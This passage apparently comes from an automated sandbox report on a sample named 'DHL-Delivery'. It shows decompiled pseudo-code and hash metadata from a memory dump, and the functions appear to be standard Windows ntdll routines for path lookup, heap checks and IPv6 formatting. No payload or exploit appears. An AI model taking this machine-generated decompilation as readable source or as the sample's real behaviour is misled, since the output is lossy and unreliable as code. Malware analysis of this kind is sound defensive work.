                        							if(_t192 != 0 && _t192 != _v204) {
                        								_v256 = _t192;
                        								E1E0F6440( &_v260);
                        							}
                        							_t193 = _v204;
                        							if(_t193 != 0) {
                        								_t256 = 0;
                        								 *_t193 = 0;
                        							}
                        						}
                        						E1E1269F0( &_v216, 0, 0x2c);
                        						_t284 = _t284 + 0xc;
                        						goto L57;
                        					}
                        					if(_t181 == 0) {
                        						if(_t269 != 0 || _t263 == 0) {
                        							L15:
                        							_t256 = 0;
                        							_t249 =  *(_t247 + 4);
                        							_v336 =  *_t247;
                        							_t203 = _a12;
                        							_v332 = _t249;
                        							_v337 = 0;
                        							if(_t203 == 0 ||  *_t203 == 0) {
                        								L23:
                        								_t276 = 0;
                        								goto L24;
                        							} else {
                        								_t252 = 0;
                        								_t280 = E1E0F0F90(1,  &_v336, 0x1e0b10f0,  &_v292);
                        								if(_t280 < 0) {
                        									if(_t280 == 0xc0000225) {
                        										L19:
                        										_t276 = 0;
                        										L20:
                        										if(_t276 < 0) {
                        											_t249 = _v332;
                        											L98:
                        											_t256 = _v337;
                        											L24:
                        											if(_t276 < 0) {
                        												goto L51;
                        											}
                        											if(_t256 != 0) {
                        												_t249 = _v240;
                        												_v336 = _v244;
                        												_v332 = _t249;
                        											}
                        											_v312 = 0;
                        											_v337 = 0;
                        											if(_v320 != 0) {
                        												_t276 = 0xc000000d;
                        												goto L42;
                        											} else {
                        												_t225 = _v336;
                        												if(_t225 < 2) {
                        													L30:
                        													if(_t225 < 4 ||  *_t249 == 0 || _t249[1] != 0x3a || _t225 < 6) {
                        														L40:
                        														_t226 = _v337;
                        														goto L41;
                        													} else {
                        														_t227 = _t249[2] & 0x0000ffff;
                        														if(_t227 != 0x5c) {
                        															if(_t227 != 0x2f) {
                        																goto L40;
                        															}
                        														}
                        														_v316 = 2;
                        														L36:
                        														_t276 = E1E0F1160( &_v336,  &_v284,  &_v324,  &_v312, 0, 0,  &_v316, 0);
                        														if(_t276 < 0) {
                        															L42:
                        															_t205 = _v320;
                        															if(_v320 != 0) {
                        																E1E0DB4F0(_t205);
                        																_v328 = 0;
                        																_v324 = 0;
                        															}
                        															L43:
                        															if(_t276 < 0) {
                        																goto L51;
                        															}
                        															if((_a4 & 0x00000001) == 0 ||  *((intOrPtr*)( *[fs:0x30] + 0x10)) == 0 || ( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00001000) == 0) {
                        																L47:
                        																_t250 = _a16;
                        																if((_v304 & 0x00000001) != 0) {
                        																	L77:
                        																	if(_t269 == 0) {
                        																		if(_t250 == 0 || _v212 ==  *((intOrPtr*)(_t250 + 4))) {
                        																			goto L78;
                        																		} else {
                        																			_t276 = 0xc0000023;
                        																			goto L82;
                        																		}
                        																	}
                        																	L78:
                        																	_t271 = _v300;
                        																	if(_t271 != 0) {
                        																		_t276 = E1E0F0F90(1,  &_v216, 0x1e0b18a0,  &_v328);
                        																		if(_t276 < 0) {
                        																			goto L51;
                        																		}
                        																		 *_t271 = ((_v328 & 0x0000ffff) >> 1) + 1;
                        																	}
                        																	_t256 =  &_v216;
                        																	_t276 = E1E11997F( &_v216);
                        																	if(_t276 < 0) {
                        																		goto L51;
                        																	}
                        																	_t256 = _v296;
                        																	if(_t256 != 0) {
                        																		 *_t256 = _v304;
                        																	}
                        																	_t276 = 0;
                        																	goto L82;
                        																}
                        																if(_t250 == 0) {
                        																	if(_t269 != 0) {
                        																		goto L49;
                        																	}
                        																	_t263 = 1;
                        																	L50:
                        																	_t256 =  &_v336;
                        																	_t276 = E1E0F02C0( &_v336, _t263,  &_v288, _v296,  &_v216);
                        																	if(_t276 >= 0) {
                        																		goto L77;
                        																	}
                        																	goto L51;
                        																}
                        																L49:
                        																_t263 = 0;
                        																goto L50;
                        															} else {
                        																_t263 =  &_v216;
                        																_t256 =  &_v336;
                        																_t276 = E1E16AE6E( &_v336,  &_v216,  &_v304);
                        																if(_t276 < 0) {
                        																	goto L51;
                        																}
                        																goto L47;
                        															}
                        														}
                        														_t234 = _v312;
                        														_t278 =  *_t234;
                        														_t251 =  *((intOrPtr*)(_t234 + 4));
                        														_v312 = _t278;
                        														if(_v316 == 6) {
                        															_t264 = _v332;
                        															if( *((short*)(_t264 + 0xa)) != 0x3a ||  *((short*)(_t264 + 0xc)) != 0x5c) {
                        																goto L38;
                        															} else {
                        																_v332 = _t264 + 8;
                        																_t256 = _v336 + 0xfff8;
                        																 *((intOrPtr*)(_t284 + 0x16)) =  *((intOrPtr*)(_t284 + 0x16)) + 0xfff8;
                        																_t263 = _v312 + 0xfff8;
                        																_t251 = _t251 + 8;
                        																_v312 = _t263;
                        																 *((intOrPtr*)(_t284 + 0x2e)) =  *((intOrPtr*)(_t284 + 0x2e)) + 0xfff8;
                        																_t278 = _v312;
                        																_v336 = _t256;
                        																L39:
                        																if(_t256 > _t263) {
                        																	_t256 =  &_v324;
                        																	if(_t234 ==  &_v324) {
                        																		_t226 = 1;
                        																	} else {
                        																		_t226 = _v337;
                        																	}
                        																	_v336 = _t278;
                        																	_v332 = _t251;
                        																	L41:
                        																	_t276 = 0;
                        																	if(_t226 != 0) {
                        																		goto L43;
                        																	}
                        																	goto L42;
                        																}
                        																goto L40;
                        															}
                        														}
                        														L38:
                        														_t256 = _v336;
                        														_t263 = _v312;
                        														goto L39;
                        													}
                        												}
                        												_t256 =  *_t249 & 0x0000ffff;
                        												if(_t256 == 0x5c || _t256 == 0x2f) {
                        													if(_t225 < 4) {
                        														goto L40;
                        													}
                        													_t256 = _t249[1] & 0x0000ffff;
                        													if(_t256 == 0x5c || _t256 == 0x2f) {
                        														if(_t225 < 6) {
                        															L111:
                        															_v316 = 1;
                        															goto L36;
                        														}
                        														_t256 = _t249[2] & 0x0000ffff;
                        														if(_t256 == 0x2e || _t256 == 0x3f) {
                        															if(_t225 < 8) {
                        																L110:
                        																if(_t225 == 6) {
                        																	goto L40;
                        																}
                        																goto L111;
                        															}
                        															_t256 = _t249[3] & 0x0000ffff;
                        															if(_t256 == 0x5c || _t256 == 0x2f) {
                        																_v316 = 6;
                        																goto L36;
                        															} else {
                        																goto L110;
                        															}
                        														} else {
                        															goto L111;
                        														}
                        													} else {
                        														goto L40;
                        													}
                        												} else {
                        													goto L30;
                        												}
                        											}
                        										}
                        										_t249 = _v332;
                        										if(_t252 == 0) {
                        											_t260 = _a12;
                        											 *(_t284 + 0x50) = _v336;
                        											 *(_t284 + 0x54) = _t249;
                        											 *((intOrPtr*)(_t284 + 0x58)) =  *_t260;
                        											 *((intOrPtr*)(_t284 + 0x5c)) =  *((intOrPtr*)(_t260 + 4));
                        											_v244 = 0;
                        											_t276 = E1E111500(_t260,  &_v244, 2, _t284 + 0x50);
                        											if(_t276 < 0) {
                        												goto L98;
                        											}
                        											_t256 = 1;
                        											goto L23;
                        										}
                        										_t256 = _v337;
                        										goto L23;
                        									}
                        									goto L20;
                        								}
                        								_t252 = 1;
                        								goto L19;
                        							}
                        						} else {
                        							L96:
                        							_t276 = 0xc000000d;
                        							goto L82;
                        						}
                        					}
                        					if(_t269 == 0 || _t256 != 0) {
                        						goto L15;
                        					} else {
                        						goto L96;
                        					}
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                        • API String ID: 0-3393094623
                        • Opcode ID: 02960b9cad06e95d8d3409e42618b1edf80bf37c09fb547e3bde92c26bff900f
                        • Instruction ID: ca607245e27a0e6fc2ca17b1f7feaec670cf72ff96434133499324457c610a83
                        • Opcode Fuzzy Hash: 02960b9cad06e95d8d3409e42618b1edf80bf37c09fb547e3bde92c26bff900f
                        • Instruction Fuzzy Hash: 60025875908382CFD320CF65C590B9BB7E2BF89744F104A2EE98997251E770D885CBA2
                        Uniqueness

                        Uniqueness Score: 6.12%

                        C-Code - Quality: 91%
                        			E1E161F50(signed short* _a4, signed int* _a8, short* _a12) {
                        				unsigned int _v8;
                        				void* _v12;
                        				signed short _v16;
                        				unsigned int _v20;
                        				signed int _v24;
                        				unsigned int _v28;
                        				signed int _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				signed short* _t85;
                        				unsigned int _t86;
                        				signed short _t99;
                        				short* _t108;
                        				signed int _t110;
                        				signed int _t112;
                        				signed int _t129;
                        				signed short _t131;
                        				signed int _t132;
                        				signed short _t134;
                        				short* _t143;
                        				signed int _t147;
                        				signed int _t149;
                        				unsigned int _t150;
                        				void* _t152;
                        				void* _t153;
                        				signed short _t154;
                        				signed int _t155;
                        				signed int* _t158;
                        				short* _t159;
                        				signed short* _t160;
                        				unsigned int _t166;
                        				signed short _t167;
                        				signed int _t169;
                        				unsigned int _t170;
                        				signed int _t172;
                        				signed short _t176;
                        				intOrPtr _t177;
                        				unsigned int _t178;
                        				unsigned int _t180;
                        				signed int _t183;
                        				void* _t184;
                        				signed int _t186;
                        				void* _t187;
                        				void* _t188;
                        
                        				_t85 = _a4;
                        				_t149 = 0;
                        				_v40 = 0;
                        				_t176 =  *_t85 & 0x0000ffff;
                        				_t154 = _t85[2];
                        				_t86 = _t176 & 0x0000ffff;
                        				_v16 = _t154;
                        				_v24 = 0;
                        				_v20 = _t176;
                        				_v12 = 0x5c;
                        				_v28 = 0x2f;
                        				_t170 = _t86;
                        				if(_t86 == 0) {
                        					L11:
                        					_v20 = 0;
                        					_v44 = 0;
                        					asm("sbb eax, eax");
                        					_v36 = ( ~_t149 & 0xfffffff8) + 8;
                        					_v8 = _t170 - (_v16 - _t154 & 0xfffffffe);
                        					_t172 =  *0x1e1cfe94; // 0x0
                        					if(_t172 != 0) {
                        						_t155 =  *0x1e1cfe90 & 0x0000ffff;
                        						_t150 = 0;
                        						_v20 = _v12;
                        						if(_t155 == 0) {
                        							L32:
                        							_t166 = _v8;
                        							L33:
                        							_t99 = _v36 + 0xe + _t150 + _v20 + _t166 + 2;
                        							_v32 = _t99;
                        							if(_t99 > 0xfffe) {
                        								L22:
                        								return 0xc0000106;
                        							}
                        							_t177 = E1E0F113F(_t99 & 0x0000ffff);
                        							_v36 = _t177;
                        							if(_t177 != 0) {
                        								E1E126370(_t177, _t172, _t150);
                        								_t188 = _t187 + 0xc;
                        								_t152 = _t177 + (_t150 >> 1) * 2;
                        								_t178 = _v20;
                        								if(_t178 != 0) {
                        									E1E126370(_t152, L"\\microsoft.system.package.metadata\\Application", _t178);
                        									_t188 = _t188 + 0xc;
                        									_t152 = _t152 + (_t178 >> 1) * 2;
                        								}
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t180 = _v8;
                        								 *((short*)(_t152 + 0xc)) = _v12;
                        								_t153 = _t152 + 0xe;
                        								E1E126370(_t153, _v16, _t180);
                        								_t108 = _t153 + (_t180 >> 1) * 2;
                        								if(_v24 != 0) {
                        									 *_t108 = 0;
                        								} else {
                        									asm("movsd");
                        									asm("movsd");
                        									asm("movsw");
                        								}
                        								_t158 = _a8;
                        								_t167 = _v44;
                        								_t158[1] = _v40;
                        								_t110 = _t167 & 0x0000ffff;
                        								_t158[0] = _t110;
                        								 *_t158 = _t110;
                        								if(_t167 != 0) {
                        									 *_t158 = _t110 + 0xfffffffe;
                        								}
                        								_t159 = _a12;
                        								 *((intOrPtr*)(_t159 + 4)) = _v36;
                        								_t112 = _v32 & 0x0000ffff;
                        								 *(_t159 + 2) = _t112;
                        								 *_t159 = _t112 + 0xfffffffe;
                        								return 0;
                        							}
                        							L35:
                        							return 0xc0000017;
                        						}
                        						while( *((short*)(_t172 + (_t150 >> 1) * 2)) != 0x3b) {
                        							_t150 = _t150 + 2;
                        							if(_t150 < _t155) {
                        								continue;
                        							}
                        							goto L32;
                        						}
                        						goto L32;
                        					}
                        					_t150 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff;
                        					_t172 =  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c);
                        					_v32 = _t172;
                        					if(( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00000001) == 0) {
                        						_t172 = _t172 +  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        						_v32 = _t172;
                        					}
                        					_t160 = _t172 + ((_t150 >> 1) - 1) * 2;
                        					_t129 = _t172;
                        					while(_t160 > _t172) {
                        						_t169 =  *_t160 & 0x0000ffff;
                        						if(_t169 == _v12 || _t169 == _v28) {
                        							_t129 =  &(_t160[1]);
                        							L21:
                        							_t131 = _t129 - _t172 & 0xfffffffe;
                        							if(_t131 <= 0xfffe) {
                        								_t132 = _t131 & 0x0000ffff;
                        								_v28 = _t132;
                        								if(_t176 > 0xfffc) {
                        									goto L22;
                        								}
                        								_t134 = _t132 + _v36 + _v8 + 2;
                        								if(_t134 > 0xfffe) {
                        									goto L22;
                        								}
                        								_v44 = _t134 & 0x0000ffff;
                        								_t183 = E1E0F113F(_t134 & 0x0000ffff);
                        								_v40 = _t183;
                        								if(_t183 == 0) {
                        									goto L35;
                        								}
                        								E1E126370(_t183, _t172, _v28);
                        								_t184 = _t183 + (_v28 >> 1) * 2;
                        								E1E126370(_t184, _v16, _v8);
                        								_t166 = _v8;
                        								_t187 = _t187 + 0x18;
                        								_t143 = _t184 + (_t166 >> 1) * 2;
                        								if(_v24 != 0) {
                        									 *_t143 = 0;
                        								} else {
                        									asm("movsd");
                        									asm("movsd");
                        									asm("movsw");
                        									_t172 = _v32;
                        								}
                        								goto L33;
                        							}
                        							goto L22;
                        						} else {
                        							_t160 = _t160 - 2;
                        							continue;
                        						}
                        					}
                        					goto L21;
                        				}
                        				_t147 = _t154 + ((_t86 >> 1) - 1) * 2;
                        				if(_t147 <= _t154) {
                        					goto L11;
                        				} else {
                        					goto L2;
                        				}
                        				do {
                        					L2:
                        					_t186 =  *_t147 & 0x0000ffff;
                        					if(_t186 != 0x2e) {
                        						if(_t186 == _v12 || _t186 == _v28) {
                        							_v16 = _t147 + 2;
                        							L10:
                        							_t176 = _v20;
                        							goto L11;
                        						} else {
                        							goto L7;
                        						}
                        					} else {
                        						if(_t149 == 0) {
                        							_t149 = _t147;
                        							_v24 = _t149;
                        						}
                        					}
                        					L7:
                        					_t147 = _t147 - 2;
                        				} while (_t147 > _t154);
                        				goto L10;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                        • API String ID: 0-2518169356
                        • Opcode ID: 402b0db1665bad1e4e263ce440c5ee23acb4e273b7b488784b98185c1e923400
                        • Instruction ID: 54acc04f4cf8a1b2026ab8be3ce49115233b82df99c484314ac79615e75c68d8
                        • Opcode Fuzzy Hash: 402b0db1665bad1e4e263ce440c5ee23acb4e273b7b488784b98185c1e923400
                        • Instruction Fuzzy Hash: 7D91E176E0065A8BCB10CF59C980AEEB7F1FF48710F6542A9E904E7350D3B59E91CB90
                        Uniqueness

                        Uniqueness Score: 3.53%

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                        • API String ID: 0-3178619729
                        • Opcode ID: bc36f76bf374192c166a2a1f7ba8c5d59db63d1d1c576cdfbfe21ccb77017a4c
                        • Instruction ID: 8b7579638b1293a0d3a35582f5e960ae3443c4d97bbf71d9985566e2d2695e84
                        • Opcode Fuzzy Hash: bc36f76bf374192c166a2a1f7ba8c5d59db63d1d1c576cdfbfe21ccb77017a4c
                        • Instruction Fuzzy Hash: 5923B170A00255DFDB14CF69C490BADBBF2FF49714F2482A9D849AB385D734A992CF50
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        Strings
                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E108062
                        • kLsE, xrefs: 1E1080DC
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                        • API String ID: 3446177414-2547482624
                        • Opcode ID: 252048135f95ae084fcc256f0ca277ef0d2069e111372fbe7f86580ad5a58a16
                        • Instruction ID: edc2b9cd51b2fe372e83d53cf9c823499317c63d217f43957c8be275851c8174
                        • Opcode Fuzzy Hash: 252048135f95ae084fcc256f0ca277ef0d2069e111372fbe7f86580ad5a58a16
                        • Instruction Fuzzy Hash: 5E51C076A04786DFD714DFA5C9806EBF7F5AF44300F204A3ED9A987204D770AA85CBA1
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 1E140FF4
                        • SsHd, xrefs: 1E0F0CA5
                        • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 1E140FA1
                        • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 1E140FD7
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                        • API String ID: 0-2905229100
                        • Opcode ID: 5ebaf4070cd2eeec7eef04fe7b473c6754bc590e422d7c88a8c3bf504d650ea9
                        • Instruction ID: 6691d3df066608e7933797696bbdf417821cb320dd33ef92cc95edfa207c8479
                        • Opcode Fuzzy Hash: 5ebaf4070cd2eeec7eef04fe7b473c6754bc590e422d7c88a8c3bf504d650ea9
                        • Instruction Fuzzy Hash: 47D1B175A0021ADFCB15CF99C8E06EDB7F6FF48310F24426AE845AB345D731A8A1CB91
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID:
                        • API String ID: 3446177414-0
                        • Opcode ID: ade935a2a0c4574093e326549f0bcf559b6d7b339ef869e404d118f4e9d23ebf
                        • Instruction ID: b4afc951cee52c6142e92816ce312cb0013866445fc7edc224a2f84488fcf9bb
                        • Opcode Fuzzy Hash: ade935a2a0c4574093e326549f0bcf559b6d7b339ef869e404d118f4e9d23ebf
                        • Instruction Fuzzy Hash: 20316779B01159AFCB18CFA5C994EAFBBB9FF8C214F554269E905E7200DB306D44CBA0
                        Uniqueness

                        Uniqueness Score: 0.70%

                        Strings
                        • HEAP: , xrefs: 1E14B1DF
                        • HEAP[%wZ]: , xrefs: 1E14B1D2
                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 1E14B1F4
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                        • API String ID: 0-3178619729
                        • Opcode ID: 49853834dee3cef1dc1bb94e216d6f26761f461f1a1a3a939bd7160d33f7b3ab
                        • Instruction ID: 878079a3d2c5a1cd3d0943b157ec4247727dabbf3cfd74cdedf495b6913d45c4
                        • Opcode Fuzzy Hash: 49853834dee3cef1dc1bb94e216d6f26761f461f1a1a3a939bd7160d33f7b3ab
                        • Instruction Fuzzy Hash: 5C12EE34600296EFDB14CF26C590BAAB7A2BF45304F358A5DE4868B785D735F9C1CB90
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1E14B0E1
                        • HEAP: , xrefs: 1E14B0D6
                        • HEAP[%wZ]: , xrefs: 1E14B0C9
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                        • API String ID: 0-1596344177
                        • Opcode ID: b3a79a006c7d1fc22d7696e1f01aeec83ae11de431a17fa0150836ff6bea0889
                        • Instruction ID: 3e15247724a1731e884b542d73df89fd065f6ab935fd8a76366a773225f1e2f2
                        • Opcode Fuzzy Hash: b3a79a006c7d1fc22d7696e1f01aeec83ae11de431a17fa0150836ff6bea0889
                        • Instruction Fuzzy Hash: DE51DF35A10655EFDB24CF59C998AADB7B2FF44310F258299D4059B386C731FD82CB90
                        Uniqueness

                        Uniqueness Score: 0.04%

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: (0u$\@u
                        • API String ID: 0-3465995676
                        • Opcode ID: e099dd0612817eb010a3b235f25ef5518a2ff1e3afa174ebca50f157f11f3bd0
                        • Instruction ID: 910984814cfbd9294aa8368200ccbfc63b687febd04d749f630efbd18d5b9146
                        • Opcode Fuzzy Hash: e099dd0612817eb010a3b235f25ef5518a2ff1e3afa174ebca50f157f11f3bd0
                        • Instruction Fuzzy Hash: B091AE747043418FD708CE25C494B6BB7E6BF88354F188ABDE886C7A45DB36E885CB51
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID: d
                        • API String ID: 0-2564639436
                        • Opcode ID: 706efad01958ab504e84671cb3bd1137f3c0ce6e6dc3eed5f3bba60b82790ef2
                        • Instruction ID: 84eb684005ab0ad15985c3ac0735b0323aa4180b7b46579c7c899e593a7093e4
                        • Opcode Fuzzy Hash: 706efad01958ab504e84671cb3bd1137f3c0ce6e6dc3eed5f3bba60b82790ef2
                        • Instruction Fuzzy Hash: 1A42BF74604242CFD718CF19C490B2AB7E2BF88714F258B6DE9969B385DB31EC95CB81
                        Uniqueness

                        Uniqueness Score: 0.57%

                        C-Code - Quality: 38%
                        			E1E11BF00(intOrPtr* _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				signed int _v20;
                        				intOrPtr _v24;
                        				signed int _t67;
                        				signed int _t72;
                        				signed int _t78;
                        				signed int _t91;
                        				signed int _t95;
                        				signed int _t100;
                        				signed int _t102;
                        				intOrPtr _t108;
                        				signed int _t109;
                        				intOrPtr _t110;
                        				signed int _t111;
                        				signed char _t118;
                        				void* _t119;
                        				signed int _t122;
                        				intOrPtr _t123;
                        				signed char _t125;
                        				intOrPtr* _t126;
                        				signed int _t127;
                        				void* _t128;
                        				void* _t136;
                        
                        				_t108 = _a8;
                        				_t126 = _a4;
                        				_t127 = 0;
                        				_v24 = 8;
                        				_v16 = _t108 + 0x5c;
                        				if( *_t126 == 0) {
                        					if( *((intOrPtr*)(_t126 + 2)) != 0 ||  *((intOrPtr*)(_t126 + 4)) != 0 ||  *((intOrPtr*)(_t126 + 6)) != 0) {
                        						goto L1;
                        					} else {
                        						_t125 =  *(_t126 + 0xc) & 0x0000ffff;
                        						_t118 = _t125 >> 8;
                        						_v20 = _t118;
                        						if(_t125 == 0) {
                        							goto L1;
                        						}
                        						_t95 =  *(_t126 + 8) & 0x0000ffff;
                        						if(_t95 != 0) {
                        							_v20 = 0xffff;
                        							if(_t95 != _v20 ||  *(_t126 + 0xa) != 0) {
                        								goto L1;
                        							} else {
                        								_push( *(_t126 + 0xf) & 0x000000ff);
                        								_push( *(_t126 + 0xe) & 0x000000ff);
                        								_push(_t118 & 0x000000ff);
                        								_t100 = E1E12DED0(_t108, 0x2e, L"::ffff:0:%u.%u.%u.%u", _t125 & 0x000000ff);
                        								L33:
                        								return _t108 + _t100 * 2;
                        							}
                        						}
                        						_t102 =  *(_t126 + 0xa) & 0x0000ffff;
                        						if(_t102 == 0) {
                        							_t119 = 0x1e0b4e94;
                        							L31:
                        							_push( *(_t126 + 0xf) & 0x000000ff);
                        							_push( *(_t126 + 0xe) & 0x000000ff);
                        							_push(_v20 & 0x000000ff);
                        							_push(_t125 & 0x000000ff);
                        							_t100 = E1E12DED0(_t108, 0x2e, L"::%hs%u.%u.%u.%u", _t119);
                        							goto L33;
                        						}
                        						if(_t102 != 0xffff) {
                        							goto L1;
                        						}
                        						_t119 = "ffff:";
                        						goto L31;
                        					}
                        				}
                        				L1:
                        				_t111 = _t127;
                        				_t67 = _t127;
                        				_v8 = _t111;
                        				_v20 = _t67;
                        				if(( *(_t126 + 8) & 0x0000fffd) == 0 &&  *(_t126 + 0xa) == 0xfe5e) {
                        					_v24 = 6;
                        				}
                        				_t122 = _t127;
                        				_t109 = _t67;
                        				do {
                        					if( *((intOrPtr*)(_t126 + _t122 * 2)) != _t127) {
                        						_t33 = _t122 + 1; // 0x1
                        						_t67 = _t33;
                        						_v20 = _t67;
                        					} else {
                        						_t136 = _t122 - _t67 + 1 - _v8 - _t109;
                        						_t67 = _v20;
                        						if(_t136 <= 0) {
                        							_t111 = _v8;
                        						} else {
                        							_t16 = _t122 + 1; // 0x1
                        							_t111 = _t16;
                        							_t109 = _t67;
                        							_v8 = _t111;
                        						}
                        					}
                        					_t122 = _t122 + 1;
                        				} while (_t122 < _v24);
                        				_v12 = _t109;
                        				_t110 = _a8;
                        				if(_t111 - _t109 <= 1) {
                        					_t111 = _t127;
                        					_t72 = _t127;
                        					_v8 = _t111;
                        					_v12 = _t72;
                        				} else {
                        					_t72 = _v12;
                        				}
                        				do {
                        					if(_t72 <= _t127) {
                        						if(_t127 >= _t111) {
                        							goto L11;
                        						}
                        						_push(L"::");
                        						_push(_v16 - _t110 >> 1);
                        						_push(_t110);
                        						_t78 = E1E12DED0();
                        						_t111 = _v8;
                        						_t128 = _t128 + 0xc;
                        						_t127 = _t111 - 1;
                        						goto L15;
                        					}
                        					L11:
                        					if(_t127 != 0 && _t127 != _t111) {
                        						_push(":");
                        						_push(_v16 - _t110 >> 1);
                        						_push(_t110);
                        						_t91 = E1E12DED0();
